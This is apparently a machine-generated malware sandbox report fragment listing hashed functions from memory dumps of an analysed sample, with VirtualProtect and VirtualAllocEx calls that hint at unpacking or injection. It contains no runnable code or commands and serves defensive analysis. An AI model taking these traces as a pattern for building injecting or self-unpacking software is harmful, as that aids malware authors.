                                                            • Snapshot File: hcaresult_4_2_2d50000_screens.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID: 0-3916222277
                                                            • Opcode ID: fa84b6f4905cb41abb4c3fae39c747d643dafbcb3f136f15df3c8daf2ba51cec
                                                            • Instruction ID: baa781092751aed0c9fef2cb1456465e710bf925dfb370961fa2ca15c58266d2
                                                            • Opcode Fuzzy Hash: fa84b6f4905cb41abb4c3fae39c747d643dafbcb3f136f15df3c8daf2ba51cec
                                                            • Instruction Fuzzy Hash: FA219771E046189BEB58CF6BD84479EFBF7ABC9200F14C1BAC818A6268EB744945CF51
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.1509042655.0000000002D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D50000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_2d50000_screens.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 7a7b68939d2d45732a2585b9bcad986cf7c436acb38be7e44ba03ff584537ee1
                                                            • Instruction ID: c24dddaa19e13e9034e7ce47cf8468c43b0f30d5692b74dca0bcadbbf899403b
                                                            • Opcode Fuzzy Hash: 7a7b68939d2d45732a2585b9bcad986cf7c436acb38be7e44ba03ff584537ee1
                                                            • Instruction Fuzzy Hash: 04A1E774E00218DFDB54DFA9D584AADBBF2FF88305F24816AE815AB368DB709941CF50
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.1509042655.0000000002D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D50000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_2d50000_screens.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 188228a9a8b75b8e5c88add0f6793716a453c2149c8a5ec7e6a41ca0659db86e
                                                            • Instruction ID: 14f4e8c10e38932a360522bb19ac5c1310ff219251de0a4756e2cced4610e714
                                                            • Opcode Fuzzy Hash: 188228a9a8b75b8e5c88add0f6793716a453c2149c8a5ec7e6a41ca0659db86e
                                                            • Instruction Fuzzy Hash: B5817FB1D046948BEF59CF668C54399FBF3AFD9210F18C1EAC84C56226E7710A46CF51
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.1529876006.000000000ABE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0ABE0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_abe0000_screens.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 4f665d405a227a3559adc94c62bd7d77c217260249d01d8afa84cc163d8f775b
                                                            • Instruction ID: 5d3114c3466b7c475a0e026733b5c7346bc61ae7805af0c745bac59df4f845c8
                                                            • Opcode Fuzzy Hash: 4f665d405a227a3559adc94c62bd7d77c217260249d01d8afa84cc163d8f775b
                                                            • Instruction Fuzzy Hash: E691C274E012589FDB18CFA6D984ADDFBF6BF88300F24956AD80AAB354DB709905CF14
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.1509042655.0000000002D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D50000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_2d50000_screens.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: e91a194f17375c9a6aa7eede62b1d67d1a1824a5843403a406f0118b1b23b304
                                                            • Instruction ID: 156901752fe3d7d3cc753311d3b5892e094971c25111d874651f91ceb3beff4a
                                                            • Opcode Fuzzy Hash: e91a194f17375c9a6aa7eede62b1d67d1a1824a5843403a406f0118b1b23b304
                                                            • Instruction Fuzzy Hash: AE512971E0421A8FCB48CFAAD4446AEFBF2EF89300F14D46AD819A7354D3749A45CF94
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.1529876006.000000000ABE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0ABE0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_abe0000_screens.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 6371f8bc0a5230492cb3968283b1add070f073b0088f258360bab690092c867d
                                                            • Instruction ID: 9a396e0e708d36dd917808c6f9f231f127a41934444b06fd20dd28bf7511e294
                                                            • Opcode Fuzzy Hash: 6371f8bc0a5230492cb3968283b1add070f073b0088f258360bab690092c867d
                                                            • Instruction Fuzzy Hash: 2D616A70D44309EFCB58EFA6E0886AEBBB1FF89301F109469D416B7254D7B48942DF50
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.1529876006.000000000ABE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0ABE0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_abe0000_screens.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: c0d55567ec6976cd33b65de96884384de5c878809f0f41975fa730105c917659
                                                            • Instruction ID: ffb18214783ca9fcf84572a01a1225da5d545b00a6a068417382b5bf096dde96
                                                            • Opcode Fuzzy Hash: c0d55567ec6976cd33b65de96884384de5c878809f0f41975fa730105c917659
                                                            • Instruction Fuzzy Hash: BE518C70D44209EFCB58DFB6E4886AEBBB1FF89301F1084AAD416B7254D7B88942DF50
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.1529876006.000000000ABE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0ABE0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_abe0000_screens.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 74286d5ce75a2629f025daa2c339bf64dec32ca67ca32120108a2bef2b198523
                                                            • Instruction ID: 4b20eaac91fedd096baa729852411c62e70362e3d11e5518b95f813079d8a27f
                                                            • Opcode Fuzzy Hash: 74286d5ce75a2629f025daa2c339bf64dec32ca67ca32120108a2bef2b198523
                                                            • Instruction Fuzzy Hash: 1551B674E012289FDB68CF6AC8446D9F7B6EF89310F14C1EAD50DA7214DB319E869F50
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.1530446511.000000000D060000.00000040.00000800.00020000.00000000.sdmp, Offset: 0D060000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_d060000_screens.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: a91471ce7662ee105f8ff7d2b49c3a424e39155b7f0e03ed232043eff4a50214
                                                            • Instruction ID: 9bf019b56043fc69b7d6eb4e66556b7ba1de38629be9be0f00df75ddeffbf01a
                                                            • Opcode Fuzzy Hash: a91471ce7662ee105f8ff7d2b49c3a424e39155b7f0e03ed232043eff4a50214
                                                            • Instruction Fuzzy Hash: 2F31FA71E006588BDB18CFA7D8546DEBBF3AFC9310F14C1AAD409AB268DB344A45CF50
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.1509042655.0000000002D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D50000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_2d50000_screens.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 10e2d93b89f27f219ba3ca238089b95d09b49b8930e50530d53a85f26f99ead2
                                                            • Instruction ID: 51259b4725338570bdd2129a94111cb3a26093725df94d1300c5cfab463b99bc
                                                            • Opcode Fuzzy Hash: 10e2d93b89f27f219ba3ca238089b95d09b49b8930e50530d53a85f26f99ead2
                                                            • Instruction Fuzzy Hash: A121D5B5E006588BEB58CFAAD84439EBBB3AFC9310F14C16AD408A6258DB741A498F51

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 736 d069920-d06994e 737 d069955-d06995a 736->737 738 d069950 736->738 751 d06995d call d069a33 737->751 752 d06995d call d069a40 737->752 738->737 739 d069963-d069969 740 d069971 739->740 741 d069978-d069994 740->741 742 d069996 741->742 743 d06999d-d06999e 741->743 742->740 742->743 744 d0699a0-d0699ba 742->744 745 d069a11-d069a15 742->745 746 d0699bc-d0699d6 742->746 747 d0699d8-d0699de 742->747 743->745 744->741 746->741 748 d0699e0-d0699ef 747->748 749 d0699f1-d0699f8 747->749 750 d0699ff-d069a0c 748->750 749->750 750->741 751->739 752->739
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.1530446511.000000000D060000.00000040.00000800.00020000.00000000.sdmp, Offset: 0D060000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_d060000_screens.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: @Vh:$yl9]
                                                            • API String ID: 0-3465494468
                                                            • Opcode ID: a9a39b58fed491f83eefe5c56aa2268edc518b87bfb8ebe67a842fa18eaf6da6
                                                            • Instruction ID: d75fc44a3b8b57c221b1671eb530718256c930f6a7c71397bcf7516c904612de
                                                            • Opcode Fuzzy Hash: a9a39b58fed491f83eefe5c56aa2268edc518b87bfb8ebe67a842fa18eaf6da6
                                                            • Instruction Fuzzy Hash: 05313C70D15209DFDB44CFAAE5806AEFBF2AF89300F24C5AAD009E7255D7748A41CF61
                                                            APIs
                                                            • VirtualProtect.KERNELBASE(?,?,?,?), ref: 02D51877
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.1509042655.0000000002D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D50000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_2d50000_screens.jbxd
                                                            Similarity
                                                            • API ID: ProtectVirtual
                                                            • String ID:
                                                            • API String ID: 544645111-0
                                                            • Opcode ID: 1143510d353dc20c24f8410d8a77f29e7219e252c082e7e395bf6f9956034188
                                                            • Instruction ID: dced5c3170ae76eded588e6928f8b3f2115e5b559e4a97ef2d35ae70df9501ee
                                                            • Opcode Fuzzy Hash: 1143510d353dc20c24f8410d8a77f29e7219e252c082e7e395bf6f9956034188
                                                            • Instruction Fuzzy Hash: 9951C9B5C042589FCB01CFA8D891ADDFFB1FF4A320F18825AE848A7211D7759A4ACF50
                                                            APIs
                                                            • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 0ABEDD5A
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.1529876006.000000000ABE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0ABE0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_abe0000_screens.jbxd
                                                            Similarity
                                                            • API ID: AllocVirtual
                                                            • String ID:
                                                            • API String ID: 4275171209-0
                                                            • Opcode ID: c4ba1560d3211795c0064c6a6bde60fb38474263c5f458ac66f08558ee01e884
                                                            • Instruction ID: dbd754a2b6baf05ea5f978612a70e4858518ba568d02ab7980ae69fa31f09fb5
                                                            • Opcode Fuzzy Hash: c4ba1560d3211795c0064c6a6bde60fb38474263c5f458ac66f08558ee01e884
                                                            • Instruction Fuzzy Hash: A641A8B9D002589FCF10CFA9D880AEEFBB1FB49310F20902AE824B7210D775A946CF54
                                                            APIs
                                                            • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 0ABEDD5A
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.1529876006.000000000ABE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0ABE0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_abe0000_screens.jbxd
                                                            Similarity
                                                            • API ID: AllocVirtual
                                                            • String ID:
                                                            • API String ID: 4275171209-0
                                                            • Opcode ID: efc733cdfeae47da7fe8c9c82ab2bb38bbfb2b4726c6ccc27a277033ebcd17e2
                                                            • Instruction ID: 6db60552c0fcc855eafa11b7312d29de38f2507774dd330c4c5f7def5eff17b4
                                                            • Opcode Fuzzy Hash: efc733cdfeae47da7fe8c9c82ab2bb38bbfb2b4726c6ccc27a277033ebcd17e2
                                                            • Instruction Fuzzy Hash: A93197B9D002589FCF10CFA9D880ADEFBB1FB49310F10902AE824B7210D775A956CF68
                                                            APIs
                                                            • VirtualProtect.KERNELBASE(?,?,?,?), ref: 02D5A357
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.1509042655.0000000002D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D50000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_2d50000_screens.jbxd
                                                            Similarity
                                                            • API ID: ProtectVirtual
                                                            • String ID:
                                                            • API String ID: 544645111-0
                                                            • Opcode ID: e6afcb20665961875eff943a903c83507e631e4c9303bb2ab4a211433925df82
                                                            • Instruction ID: 9ab157b1f6b7ab3ad458ee767b16a69370f189b376fa76e094b73911bbf9c0ab
                                                            • Opcode Fuzzy Hash: e6afcb20665961875eff943a903c83507e631e4c9303bb2ab4a211433925df82
                                                            • Instruction Fuzzy Hash: 863177B9D042589FCF10CFAAE584ADEFBB1BB09310F24902AE864B7310D775A945CF64
                                                            APIs
                                                            • VirtualProtect.KERNELBASE(?,?,?,?), ref: 02D51877
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.1509042655.0000000002D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D50000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_2d50000_screens.jbxd
                                                            Similarity
                                                            • API ID: ProtectVirtual
                                                            • String ID:
                                                            • API String ID: 544645111-0
                                                            • Opcode ID: 1b5f25d76ba33231a8a08786c89c9bc377cc1ba3002ae80d3a3e5ea2d6449d89
                                                            • Instruction ID: e1366514d461749d659ef96e54c419e55df67ab47ee201f0fb47d803a1e5b87b
                                                            • Opcode Fuzzy Hash: 1b5f25d76ba33231a8a08786c89c9bc377cc1ba3002ae80d3a3e5ea2d6449d89
                                                            • Instruction Fuzzy Hash: BF3179B9D042589FCF10CFA9D584ADEFBB5BB19310F24902AE818B7310D775A945CF64
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.1530245195.000000000AEA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0AEA0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_aea0000_screens.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: ,
                                                            • API String ID: 0-3772416878
                                                            • Opcode ID: 4ea2c32b6756a222f0034831bc5d8d28f4be2a4fa103860d68edbae14e31650c
                                                            • Instruction ID: 112782b9b4a514d844803d8e44181c017c4f54eb3f8a242b39c5835d70392c79
                                                            • Opcode Fuzzy Hash: 4ea2c32b6756a222f0034831bc5d8d28f4be2a4fa103860d68edbae14e31650c
                                                            • Instruction Fuzzy Hash: FF21B3B49402299FDB60DF68D9847D9B7B6BB68300F1081D69549A7350DB70AEC08F54
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.1530446511.000000000D060000.00000040.00000800.00020000.00000000.sdmp, Offset: 0D060000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_d060000_screens.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: r>
                                                            • API String ID: 0-2908804962
                                                            • Opcode ID: 7c1dc26166c24cab7d9144f08cd616827fab483f867bf0c0c29c385708205a15
                                                            • Instruction ID: 6e221b6452a20ca648a6ef8fed0778223cab81f98055b49d6302c46ffc5e4ba2
                                                            • Opcode Fuzzy Hash: 7c1dc26166c24cab7d9144f08cd616827fab483f867bf0c0c29c385708205a15
                                                            • Instruction Fuzzy Hash: 26114C70A19244DFC755DFB4E98D1ADBFB1FF8A206F24C4EAD109D3268D6308946CB10
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.1530446511.000000000D060000.00000040.00000800.00020000.00000000.sdmp, Offset: 0D060000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_d060000_screens.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: r>
                                                            • API String ID: 0-2908804962
                                                            • Opcode ID: 64a796dfa64a9ae311a7a11601cd68e8d901b590d6c698e7820e9541a07ea2d8
                                                            • Instruction ID: 9c45a4d252877786f0bae15ccc8723fea4d349722b77e246d50a8488b507c808
                                                            • Opcode Fuzzy Hash: 64a796dfa64a9ae311a7a11601cd68e8d901b590d6c698e7820e9541a07ea2d8
                                                            • Instruction Fuzzy Hash: 42018070A05204EFD754DFB5E98C55DBBF6FB89206F20C4A5D40DD2258E7308A058B10
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.1530245195.000000000AEA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0AEA0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_aea0000_screens.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: LRq
                                                            • API String ID: 0-3187445251
                                                            • Opcode ID: 6bbe563d22e11013d1abf9b0bbb9cd350e2d0a4da3b802538f6faed5bce9b5cf
                                                            • Instruction ID: 6059534d43074122683927bcd379550f4af5e449e05a3f55fb3ab7ac5650faa8
                                                            • Opcode Fuzzy Hash: 6bbe563d22e11013d1abf9b0bbb9cd350e2d0a4da3b802538f6faed5bce9b5cf
                                                            • Instruction Fuzzy Hash: B7F01F30A00119EFDF24DFA2DD50AECBB76BF85300F2091AAA508B7254DA305E969F10
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.1530245195.000000000AEA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0AEA0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_aea0000_screens.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 8000c09616715c2a1a830e4e440eac847d952469dc06142d2164de14a6fcf80c
                                                            • Instruction ID: 3b72dfe110bde08e9e3e57867aae88eb4605ecb8ecf5e24772dd2b5db90bcd23
                                                            • Opcode Fuzzy Hash: 8000c09616715c2a1a830e4e440eac847d952469dc06142d2164de14a6fcf80c
                                                            • Instruction Fuzzy Hash: EF51B174E002099FCF44CFE9D840AEEBBB6FF88310F14912AD819AB254DB35A916CF54
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.1530245195.000000000AEA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0AEA0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_aea0000_screens.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: c914491f31a7c1657da63f965fe191a44a0376c956dd5423f5260c17c29197da
                                                            • Instruction ID: 026b1cfd37d7e0c1d1a0b7ddba9af388b42ccedae986c14bb7b95c6225015c3f
                                                            • Opcode Fuzzy Hash: c914491f31a7c1657da63f965fe191a44a0376c956dd5423f5260c17c29197da
                                                            • Instruction Fuzzy Hash: E951D274E002499FCF44CFA9D840AEEBBB2FF88310F14952AE815AB354EB359916CF50
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.1530446511.000000000D060000.00000040.00000800.00020000.00000000.sdmp, Offset: 0D060000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_d060000_screens.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 22466b4203a5518023697ea3c5bcaa1019184e68c2bff0e41dff04ac1db85c03
                                                            • Instruction ID: d574d24a01c39f96ce9f67c30fb408c3f41d413b163da0757d99568c374a801f
                                                            • Opcode Fuzzy Hash: 22466b4203a5518023697ea3c5bcaa1019184e68c2bff0e41dff04ac1db85c03
                                                            • Instruction Fuzzy Hash: A0313AB4E04209EFDB48CFA9C5815AEBBF2BF89314F14C4AAD419A7314E3349A01CF61
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.1530446511.000000000D060000.00000040.00000800.00020000.00000000.sdmp, Offset: 0D060000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_d060000_screens.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 959547b8a11b2a2431eff7523581961c4e1c602fa78bc813efdcd6b5170cf0ad
                                                            • Instruction ID: 483fa7af5dee82414e8e8c0d9dce4e5b03eb5830cd7f67a5f052e2b0d4e988d7
                                                            • Opcode Fuzzy Hash: 959547b8a11b2a2431eff7523581961c4e1c602fa78bc813efdcd6b5170cf0ad
                                                            • Instruction Fuzzy Hash: B13105B4E14209CFDB84CFA9C480AAEBBF2FF89314F1485AAC419E7714D7349A41CB51
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.1530446511.000000000D060000.00000040.00000800.00020000.00000000.sdmp, Offset: 0D060000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_d060000_screens.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 74ae408de65a7965ed83e82c1ce2226226af370af9bf450e7860b25f0e2880c3
                                                            • Instruction ID: 435bb132ac3af9bfe6abf5dfce955fd07cad48b64ecdeff6314f197f7cf4e2f8
                                                            • Opcode Fuzzy Hash: 74ae408de65a7965ed83e82c1ce2226226af370af9bf450e7860b25f0e2880c3
                                                            • Instruction Fuzzy Hash: 7D31D7B4E10209DFDB84DFA9C480AAEBBF2FF88314F10956AD819A7714D7749941CF61
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.1530245195.000000000AEA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0AEA0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_aea0000_screens.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 32b67e36ba261e2d78f1e1303bfb3f1234da5a6821560974dc5679f94b852005
                                                            • Instruction ID: 587a729db713590809f396bda0fa9e4361b1c311eb09c1a07cb39e9fda0e6c8d
                                                            • Opcode Fuzzy Hash: 32b67e36ba261e2d78f1e1303bfb3f1234da5a6821560974dc5679f94b852005
                                                            • Instruction Fuzzy Hash: 703170B4A012299FDB61DF58CD94BD9BBB5EB88304F1090D9A90DA7354DA309E81CF14
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.1530245195.000000000AEA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0AEA0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_aea0000_screens.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 2df63e78d42499528f7a4ba8c68eb518827c8091e3e993d68e6219234f937098
                                                            • Instruction ID: ea595423897fd109a2a60c2b8a1569564c8060b0e951e70f150daa9c582bda65
                                                            • Opcode Fuzzy Hash: 2df63e78d42499528f7a4ba8c68eb518827c8091e3e993d68e6219234f937098
                                                            • Instruction Fuzzy Hash: 2421B2B5A012289FEB64DF69C950BD9BBF9BB89300F1491E9D409E7341D731AE808F60
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.1530245195.000000000AEA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0AEA0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_aea0000_screens.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: c86caf20a1a3c3aa8eaa8cee3e72bf130a31c6925ce2644d855f388be31ded6c
                                                            • Instruction ID: 0fb3817eddd48140a7e0316901111563e980b1e70035931c3ab0bfaac6e0ac0d
                                                            • Opcode Fuzzy Hash: c86caf20a1a3c3aa8eaa8cee3e72bf130a31c6925ce2644d855f388be31ded6c
                                                            • Instruction Fuzzy Hash: 8221A875A002189FDBA5CF68CC94B9AB7B6FB98300F1481D9944DE7254DB31AE81CF14
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.1530446511.000000000D060000.00000040.00000800.00020000.00000000.sdmp, Offset: 0D060000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_d060000_screens.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: effc585584561ae999060f75f5d17497eb1c4f0348fbd70478203ee58fc886ed
                                                            • Instruction ID: 13cefb8b7688170e3f937d3a226d4a0a7df0ae065d6ca743d159de009d7afb1e
                                                            • Opcode Fuzzy Hash: effc585584561ae999060f75f5d17497eb1c4f0348fbd70478203ee58fc886ed
                                                            • Instruction Fuzzy Hash: 33211775E05208DFDB44CFA9DA84A9DFBF2EF89200F18C4AAD419D7365D630DA11DB40
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.1530446511.000000000D060000.00000040.00000800.00020000.00000000.sdmp, Offset: 0D060000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_d060000_screens.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: f058e8af9dbdf95db2c53824b2e244920f0d6a07e60f7fd12b0da12cebe83fa4
                                                            • Instruction ID: ed1563b884efd8c420351be5c6b018ecdbe2a85152802055770546ea63a5e902
                                                            • Opcode Fuzzy Hash: f058e8af9dbdf95db2c53824b2e244920f0d6a07e60f7fd12b0da12cebe83fa4
                                                            • Instruction Fuzzy Hash: 4911E774E00208DFDB44DFA9D585A9DFBF6EF88200F15C4AA941997354E770DA01DB40
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.1530245195.000000000AEA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0AEA0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_aea0000_screens.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: f9873f9d1f2ffc768ccc3f325cebe95e5fc9f6679c70e810c105fb58591dd553
                                                            • Instruction ID: 008bca300547f3f3b99a5a7a09afa0c2842b646e10749c1c360117913d5a9aa8
                                                            • Opcode Fuzzy Hash: f9873f9d1f2ffc768ccc3f325cebe95e5fc9f6679c70e810c105fb58591dd553
                                                            • Instruction Fuzzy Hash: 861148B5A006199FDB61DB65CC44BEAB7BAFB98300F1490D5E40DE7264DA30AE818F24
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.1530245195.000000000AEA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0AEA0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_aea0000_screens.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 58d4a00553a031d62d237997468747cc3bda4258dc3a23d349e0317cc1dc7f18
                                                            • Instruction ID: 6036c3d223786c6ed14b4b3a7979ba2fa1bc574d23fb85c420f2e785ff2b174f
                                                            • Opcode Fuzzy Hash: 58d4a00553a031d62d237997468747cc3bda4258dc3a23d349e0317cc1dc7f18
                                                            • Instruction Fuzzy Hash: 3F116070904218DBDB95CF54CC90BA9B772FF85300F1485EEC909AA259DB729A41DF51
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.1530245195.000000000AEA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0AEA0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_aea0000_screens.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: e816adeee9ee9e27bf12bb18e5704c0d02ea325d03df488d78ac814b4fbb6947
                                                            • Instruction ID: 0022357adc761243ecab97fa8d691f30f6828c34861885760d096103c6674fb5
                                                            • Opcode Fuzzy Hash: e816adeee9ee9e27bf12bb18e5704c0d02ea325d03df488d78ac814b4fbb6947
                                                            • Instruction Fuzzy Hash: E3217C74A012688FEB64CF58CD90B9DFBB1BB48304F1481DAD80DAB254DA31AE81CF50
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.1530245195.000000000AEA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0AEA0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_aea0000_screens.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: c97f6692d761c74b795fd686b75d407ae5c12ffb1f7b6585d07191191376ab84
                                                            • Instruction ID: 5c0d0391bed9cdcdba3d69103678319f416be18a211362fafad013965dede62b
                                                            • Opcode Fuzzy Hash: c97f6692d761c74b795fd686b75d407ae5c12ffb1f7b6585d07191191376ab84
                                                            • Instruction Fuzzy Hash: 99112A74D04159EFDF65CF91DD44BCDBBB2AF84300F5494E99009AB654DA309E959F00
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.1530245195.000000000AEA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0AEA0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_aea0000_screens.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
